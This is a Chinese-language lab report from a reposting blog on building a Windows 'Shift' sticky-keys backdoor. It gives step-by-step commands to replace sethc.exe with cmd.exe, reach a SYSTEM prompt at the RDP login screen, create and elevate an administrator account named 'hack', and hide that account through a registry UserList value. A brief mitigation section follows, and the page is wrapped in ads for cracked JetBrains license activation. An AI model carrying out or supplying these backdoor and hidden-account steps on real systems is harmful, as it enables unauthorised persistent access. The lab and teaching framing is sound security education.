创建shift后门实验总结_shift加delete

创建shift后门实验总结_shift加delete一、实验目的及要求 1.学会创建Shift后门 2.掌握shift后门的原理 二、实验设备(环境)及要求 PC机,VC++等,虚拟云平台 三、实验内容与步骤 1.在192.168.1.3的虚拟机上打开cmd命令指示符; 2.输入“cdc:\WINDOWS\system32”,进入该文件夹; 3.输入…

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

一、实验目的及要求

1. 学会创建Shift后门

2.掌握shift后门的原理

 

二、实验设备(环境)及要求

   PC机, VC++等,虚拟云平台

三、实验内容与步骤

1.在192.168.1.3的虚拟机上打开cmd命令指示符;

2.输入“ cd  c:\WINDOWS\system32”,进入该文件夹;

3.输入“move sethc.exe sethc.exe.bak”,对“sethc.exe”进行备份;

4.输入“copy cmd.exe sethc.exe”,对cmd.exe进行复制并更名为“sethc.exe”;

5.打开控制面板-> 辅助功能选项->勾选“使用粘滞键”,点击应用;

6.打开192.168.1.2的虚拟机,打开运行,输入“mstsc”打开远程登录程序;

7.输入“192.168.1.3”,点击连接;

8.当出现登录界面时,按5下shift键可进入目标机的cmd中;

9.在cmd中输入“net user hack 123 /add”,创建用户;

10.接下来输入“net localgroup administrators hack /add”和“net user hack /active:yes”,对hack用户进行提权和激活;

11.用hack用户登录目标机。

 

 

四、实验结果与数据处理

1.对192.168.1.3的虚拟机的命令操作

 

 

创建shift后门实验总结_shift加delete

 

2.使用粘滞键

创建shift后门实验总结_shift加delete

 

 

 

 

3.用192.168.1.2的虚拟机远程登录192.168.1.3的虚拟机时,创建用户。并对其进行提权和激活

创建shift后门实验总结_shift加delete

 

 

 

 

4.成功登录目标机

 

 

 

 

 

 

创建shift后门实验总结_shift加delete

 

 

五、分析与讨论

  1.本实验是利用在应用“使用粘滞键”后,windows系统在按5次shift后会调用“sethc.exe”应用程序的原理,将cmd.exe复制并更名为“sethc.exe”,然后替换掉原有的sethc.exe文件,这样在登陆界面的时候我们连续按下5吃shift键系统就会运行cmd.exe,这样我们就可以对目标机进行创建用户,对用户进行相关提权和激活,从而进入目标机。

  2.防范措施:

(1)禁用shift键的粘滞功能;

(2)设置权限,让任何用户都无法访问和修改“sethc.exe”文件。

3.如何创建隐藏用户:

  创建用户后,按win+r,输入regedit回车,把注册表放到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList,在里面创建一个dword值,命名为你要隐藏的用户名,数值0。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/192139.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • mysql 加入�列,改动列,删除列。

    mysql 加入�列,改动列,删除列。

  • SpringBoot集成Mybatis保姆级教程(完整版)

    SpringBoot集成Mybatis保姆级教程(完整版)贴心又实用的干货教程,千万别错过

  • SQL中EXISTS的使用

    SQL中EXISTS的使用1.简介不相关子查询:子查询的查询条件不依赖于父查询的称为不相关子查询。相关子查询:子查询的查询条件依赖于外层父查询的某个属性值的称为相关子查询,带EXISTS的子查询就是相关子查询EXISTS表示

  • 软件测试——黑盒测试方法

    软件测试——黑盒测试方法1、测试用例的定义:是为了特定的目的而设计的一组有测试输入、执行条件、预期结果的案例(文档)2、测试用例的构成要素:例如qq邮箱用例测试:3、黑盒测试黑盒测试用例设计方法:等价类、边界值、判

  • zencart模板分析

    zencart模板分析ZenCart的模板设计说简单其实也挺简单的说复杂也比较复杂,需要一定的时间来熟悉。一旦你了解了它的结构,就会慢慢习惯了。首先要阅读常见问答部分的:如何添加、制作新模板。ZenCart的设计没有什么特别,与以前设计HTML页面是一样的。只是整个页面分成了好几个部分,并加入了php代码。(设计Zencart模板制作需要理解PHP和CSS样式定义)通常,页面分为页眉(header),页

  • Linux下在线安装Node.js

    Linux下在线安装Node.jsCentos下在线安装Node.jsLinux下在线安装Node.js查看有哪些版本dnfmodulelistnodejs安装nodejs14dnfmoduleinstallnodejs:14验证是否安装成功node-v

    2022年10月21日

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号